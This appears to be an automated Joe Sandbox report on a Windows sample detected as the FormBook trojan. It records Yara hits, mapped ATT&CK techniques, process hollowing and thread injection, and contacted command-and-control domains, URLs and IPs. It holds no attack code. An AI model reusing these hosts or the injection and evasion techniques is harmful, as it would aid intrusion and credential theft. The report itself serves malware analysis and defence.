          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458944 Sample: mvui1vY6Mo Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 32 www.comparaca.com 2->32 34 shops.myshopify.com 2->34 36 comparaca.myshopify.com 2->36 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 4 other signatures 2->54 10 mvui1vY6Mo.exe 2->10         started        signatures3 process4 signatures5 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 13 mvui1vY6Mo.exe 10->13         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 13->60 62 Maps a DLL or memory area into another process 13->62 64 Sample uses process hollowing technique 13->64 66 Queues an APC in another process (thread injection) 13->66 16 cmmon32.exe 12 13->16         started        20 explorer.exe 13->20 injected process8 dnsIp9 38 Performs DNS queries to domains with low reputation 16->38 40 Modifies the context of a thread in another process (thread injection) 16->40 42 Maps a DLL or memory area into another process 16->42 44 Tries to detect virtualization through RDTSC time measurements 16->44 22 cmd.exe 1 16->22         started        26 www.466se.com 198.74.106.237, 49755, 80 MULTA-ASN1US United States 20->26 28 circusocks.com 163.123.204.26, 49754, 80 ILIGHT-NETUS Reserved 20->28 30 5 other IPs or domains 20->30 46 System process connects to network (likely due to code injection or exploit) 20->46 signatures10 process11 process12 24 conhost.exe 22->24         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          mvui1vY6Mo.exe59%VirustotalBrowse
          mvui1vY6Mo.exe61%ReversingLabsWin32.Trojan.FormBook
          mvui1vY6Mo.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.mvui1vY6Mo.exe.2eb0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.mvui1vY6Mo.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          ejsuniqueclasses.com2%VirustotalBrowse
          www.466se.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.circusocks.com/ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Ky0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          www.ejsuniqueclasses.com/ehp9/0%Avira URL Cloudsafe
          http://www.466se.com/ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxO0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.856380062.xyz/ehp9/?zZbXur=fPkLdxO&0vrPA=sBJ6lOoTYYoNcaluCGHxKraeNDG0llcp1STurr5zu7Kck/pV0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.healthpragency.com/ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxO0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.ejsuniqueclasses.com/ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1T0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ejsuniqueclasses.com
          164.68.104.58
          truetrueunknown
          www.466se.com
          198.74.106.237
          truetrueunknown
          www.healthpragency.com
          52.58.78.16
          truetrue
            unknown
            www.856380062.xyz
            103.88.34.80
            truetrue
              unknown
              shops.myshopify.com
              23.227.38.74
              truefalse
                unknown
                circusocks.com
                163.123.204.26
                truetrue
                  unknown
                  www.comparaca.com
                  unknown
                  unknowntrue
                    unknown
                    www.circusocks.com
                    unknown
                    unknowntrue
                      unknown
                      www.ejsuniqueclasses.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.circusocks.com/ehp9/?zZbXur=fPkLdxO&0vrPA=oRr9ZXza/sqKFb1a4cLVquMpSAfNXH/ZGOEKtA079HuOHtafooLLPyAXrAQLja/+16Kytrue
                        • Avira URL Cloud: safe
                        unknown
                        www.ejsuniqueclasses.com/ehp9/true
                        • Avira URL Cloud: safe
                        low
                        http://www.466se.com/ehp9/?0vrPA=UsPTfcJ0BZ5q3mR+pFMXthX3126RUWmODdEpc4rh++F4qt19VniXLc7dOQb8qNRTbKnv&zZbXur=fPkLdxOtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.healthpragency.com/ehp9/?0vrPA=5Xsjz7+Z5WLh89j81EYl3Aroso+z/qN2CpRl0IKGrQQKTktOwLuaqldWAZoOLzUBzR5Q&zZbXur=fPkLdxOtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ejsuniqueclasses.com/ehp9/?zZbXur=fPkLdxO&0vrPA=8c/5QoMWiMUW3SjDqDOgvqNfypt6IHckOwJjeT/c3u4BTCnBI4ecsnyb0a1UBRXLCY1Ttrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.comexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.856380062.xyz/ehp9/?zZbXur=fPkLdxO&0vrPA=sBJ6lOoTYYoNcaluCGHxKraeNDG0llcp1STurr5zu7Kck/pVcmmon32.exe, 0000000B.00000002.915247011.0000000000C60000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.%s.comPAexplorer.exe, 00000004.00000000.663579400.0000000002B50000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://www.fonts.comexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comexplorer.exe, 00000004.00000000.684876231.000000000B976000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            52.58.78.16
                                            www.healthpragency.comUnited States
                                            16509AMAZON-02UStrue
                                            163.123.204.26
                                            circusocks.comReserved
                                            1767ILIGHT-NETUStrue
                                            164.68.104.58
                                            ejsuniqueclasses.comGermany
                                            51167CONTABODEtrue
                                            103.88.34.80
                                            www.856380062.xyzChina
                                            136188CHINATELECOM-ZHEJIANG-NINGBO-IDCNINGBOZHEJIANGProvincetrue
                                            198.74.106.237
                                            www.466se.comUnited States
                                            35916MULTA-ASN1UStrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:458944
                                            Start date:03.08.2021
                                            Start time:22:17:20
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 8m 40s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:mvui1vY6Mo (renamed file extension from none to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:21
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@8/0@7/5
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 35.2% (good quality ratio 32.2%)
                                            • Quality average: 75.4%
                                            • Quality standard deviation: 31.2%
                                            HCA Information:
                                            • Successful, ratio: 94%
                                            • Number of executed functions: 82
                                            • Number of non-executed functions: 93
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.5.146, 40.88.32.150, 168.61.161.212, 23.211.6.115, 20.82.209.183, 93.184.221.240, 20.82.210.154, 80.67.82.211, 80.67.82.235, 40.112.88.60
                                            • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, wu.azureedge.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            52.58.78.16Form_TT_EUR57,890.exeGet hashmaliciousBrowse
                                            • www.mobiessence.com/6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8
                                            NEW ORDER.xlsxGet hashmaliciousBrowse
                                            • www.legifo.com/n84e/?Mr08h0L=KHFThDJ3uNdvz4VUDR+6bS8SYcpLrpRC8lOMf3TlZ3PS/XcNx/3d4GJoUukLL5LRpfRfOA==&zVopsT=6lRxBfwpGVRluDfp
                                            Payment confirmation.exeGet hashmaliciousBrowse
                                            • www.simplenorwegian.com/iq3g/?IrK=CZ/yXVcNRdC6FvxinIXGrVmHiuR1WjT6SNukwgkxBNtmMQmyCWCLRoMj7G3k0Wznru0p&U0GD=nTvlUPapR
                                            DHL Shipment Notification,PDF.exeGet hashmaliciousBrowse
                                            • www.crosschainconsulting.com/d8ak/?l8zt=jDth58DB5imLqUkIs94ZrvJvWs5Ik/QXC2wgF4rLpwBCIv0jyvuCPBHay7TuoSVne/lyNJlz0g==&GT=8pBhLdXXedUx8
                                            RhalEFwYre.exeGet hashmaliciousBrowse
                                            • www.mobiessence.com/6mam/?7nZp_P=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH6NTpTQPuYh&l48tB=-ZYD52r
                                            RYP-210712.xlsxGet hashmaliciousBrowse
                                            • www.threatprotection.net/6mam/?O2M0W=yVJpjpi8601X&TP=5U63IG+7yBTG2LU/sbhPJsaYeNu0pzfei2tMILncnfG3lfTZPYhqam4eeguQu/uCp/fddQ==
                                            sMpEuBRc2t.exeGet hashmaliciousBrowse
                                            • www.ecofingers.com/dy8g/?OR-TuR7X=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0knK24QskGlt&aPpl=k0DD1ZKh
                                            INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                            • www.midgefly.com/vtg0/?8pcx=sCrA+W5O6oNqspHIzbx/VoZ2gHLngFo2bTHVR61MqOIzfC7Xnf47aZIrFlXsjUrU46mf&b8Zd=YdoHsDD
                                            6al00IjI6j.exeGet hashmaliciousBrowse
                                            • www.walkonhome.com/p1nr/?EVL=7zqpjNgTocuQEZ/7cot9yzbg96wEePlUEUbJytYr6EKC6aCaKn2SKTFFolhpeAkAzVfO4NkQJQ==&YTOx3p=8pgHdZbp
                                            RYP-210629.xlsxGet hashmaliciousBrowse
                                            • www.mobiessence.com/6mam/?8pWX_=KE8gpfUButRuMRaKHV5goIwNmc44LE6Oi+XDAS05rkp2RTHle1NPjCzZMh2LYYHbaIsWTA==&YH=c8zlrpFp7PZpmtep
                                            Invoice Amount 14980.exeGet hashmaliciousBrowse
                                            • www.bvlesty.com/p4se/?7npd928=bQMAraj1xKdOkCzLuHERhNooHK+QGPNFLNpMJV9bH8WlaoVv6+ueUmNZD2UWSIOcTisLluXEOQ==&U2M=m0GHc
                                            moni 33.exeGet hashmaliciousBrowse
                                            • www.kathyharvey.com/weni/?eB2=SZj8b&9rjDM4rH=7yHtpb+g0rUXbgxV21t9L0ENNL4bw8lTqOTLyZUlhT1yXa0UMrAsRH4DxLIXKzBvV8Hk
                                            ORDER -ASLF1SR00116-PDF.docGet hashmaliciousBrowse
                                            • www.alorve.com/b8eu/?ezr8A=fO29zInUMKyU3b+KsEdF7DM9YDGDqhkmHUf250wyCdvZQv4CxZtnkbBczt1PyCe3FLSzQg==&9rXX=a0DtZFt
                                            PO#2005042020.exeGet hashmaliciousBrowse
                                            • www.ameri.loans/dt9v/?gHX8R=3f94lB&1b=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLaysybCXDa0Ipi
                                            Tvpsqjokvrkkjtpqmbrrbdjuamqgumvxld.exeGet hashmaliciousBrowse
                                            • www.midtransport.com/bsk9/?i2MTzj=e6Ad4DCXPNMpz&R6ALR=nGfZtT9z8NqeTucFxi+gOh3uBJjOp6VLDHhxDth/dQigt4sUKXTHk5a7oDAXiSxv27Tv
                                            shipping documents pdf.exeGet hashmaliciousBrowse
                                            • www.unitedold.com/h388/?tXPL5r6=HeOxd3fTK3emeSZhIcEHyZUbH5pi5uzRBKaOyXjbbuHI/gxjF5X3QotEpSoKmdp15nJu&3fVtLD=R62l7bm8DvSh1
                                            6WCqIIE3Lr.exeGet hashmaliciousBrowse
                                            • www.walkonhome.com/p1nr/?dF=7zqpjNgTocuQEZ/7cot9yzbg96wEePlUEUbJytYr6EKC6aCaKn2SKTFFomNTdBI7wi+f&3fd=t0DXgf78DRWhP
                                            Order600567.exeGet hashmaliciousBrowse
                                            • www.nyprfirm.com/dt9v/?9r=KpNyOXsodBFrYFoEJWESYJ8j+xdDddhLA6DxFp7h+PiJibU+kgoAhy+eZziY74LDARZk&yt=WN9pTDLhcH
                                            PYY74882220#.exeGet hashmaliciousBrowse
                                            • www.jayhoudontcy.com/uts2/?DJBpbT=eq1DVE9pIkM/j+XzQEEtVvuS45EQn6ChhwPxb1E+vp9zidYYg0/iq0gGrr3/IXwpgX+z&bPw0=RjQtV0Ip1lbh
                                            v8kZUFgdD4.exeGet hashmaliciousBrowse
                                            • www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx
                                            164.68.104.58wMqdemYyHm.exeGet hashmaliciousBrowse
                                            • www.ejsuniqueclasses.com/f0sg/?7n0lqHm=RD2tywN0qen0MznjTH5w58f8vni0uSDATZhtlh9xAz/QS3pDgsNhlBhKQDKwaal1DgGG&CP=chrxU

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            shops.myshopify.comNouveau bon de commande. 3007021_pdf.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            Purchase Requirements.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            Form_TT_EUR57,890.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            payment copy.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            PO_0008.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            i9Na8iof4G.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            bin.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            Payment For Invoice 321-1005703.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            RYP-210712.xlsxGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            INV NO-1820000514 USD 270,294.pdf.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            auhToVTQTs.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            kKTeUAtiIP.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            Invoice Amount 14980.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            W7f.PDF.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            Order Signed PEARLTECH contract and PO.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            MR# RFx 21-2034021.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            AWB & Shipping Tracking Details.exeGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            ORDER -RFQ#-TEOS1909061 40HC 21T05 DALIAN.docGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            Nsda7LTM1x.exeGet hashmaliciousBrowse
                                            • 23.227.38.74

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            ILIGHT-NETUSSARS_DOCUMENT - Copy.htmlGet hashmaliciousBrowse
                                            • 152.228.223.13
                                            w4DEaimFEtGet hashmaliciousBrowse
                                            • 199.13.204.199
                                            w4MaMzd0i1Get hashmaliciousBrowse
                                            • 199.14.229.225
                                            Loader.exeGet hashmaliciousBrowse
                                            • 152.228.150.198
                                            EM7kj9300xGet hashmaliciousBrowse
                                            • 152.228.110.191
                                            MMrfxxpTLPGet hashmaliciousBrowse
                                            • 137.114.114.119
                                            6HAisf3waNGet hashmaliciousBrowse
                                            • 157.91.133.210
                                            c51w5YSYdOGet hashmaliciousBrowse
                                            • 159.218.155.213
                                            u47x3rc20tGet hashmaliciousBrowse
                                            • 159.218.253.86
                                            zhPAQB7FPVGet hashmaliciousBrowse
                                            • 161.33.66.54
                                            BWG6npgduPGet hashmaliciousBrowse
                                            • 199.13.163.48
                                            jEbpttXKCaGet hashmaliciousBrowse
                                            • 159.218.253.96
                                            0aC0TBcdxbGet hashmaliciousBrowse
                                            • 152.228.110.163
                                            #Ud83d#Udd0ajs_msg_ 3pm.htmlGet hashmaliciousBrowse
                                            • 152.228.223.13
                                            #Ud83d#Udd0aMsg_ 3pm.htmlGet hashmaliciousBrowse
                                            • 152.228.223.13
                                            INV_RECON_72919_81821.htmlGet hashmaliciousBrowse
                                            • 152.228.223.13
                                            __-joerg.mathieu.htmGet hashmaliciousBrowse
                                            • 152.228.223.13
                                            KHv0I3XdY6.exeGet hashmaliciousBrowse
                                            • 152.228.150.198
                                            sample_payment.htmlGet hashmaliciousBrowse
                                            • 152.228.223.13
                                            Injector.exeGet hashmaliciousBrowse
                                            • 152.228.150.205
                                            AMAZON-02USctapp_230720_b1nt12.zipGet hashmaliciousBrowse
                                            • 54.70.175.13
                                            Dosusign_Na_Sign.htmGet hashmaliciousBrowse
                                            • 54.200.233.179
                                            document.xlsmGet hashmaliciousBrowse
                                            • 65.9.71.95
                                            document.xlsmGet hashmaliciousBrowse
                                            • 65.9.71.119
                                            InNXA1LFMyGet hashmaliciousBrowse
                                            • 52.24.2.19
                                            Z06maMhQlw.exeGet hashmaliciousBrowse
                                            • 104.192.141.1
                                            OJYNvmFRjrGet hashmaliciousBrowse
                                            • 54.117.189.7
                                            AEOjFHGJArGet hashmaliciousBrowse
                                            • 44.246.15.55
                                            oustanding 03082921.xlsxGet hashmaliciousBrowse
                                            • 13.229.216.142
                                            1ashnfHZve.exeGet hashmaliciousBrowse
                                            • 54.94.248.37
                                            U2AHuu893x.exeGet hashmaliciousBrowse
                                            • 54.94.248.37
                                            w7DRtI5vjJGet hashmaliciousBrowse
                                            • 34.221.177.96
                                            xl2TVqLo6SGet hashmaliciousBrowse
                                            • 13.50.207.75
                                            Form_TT_EUR57,890.exeGet hashmaliciousBrowse
                                            • 52.58.78.16
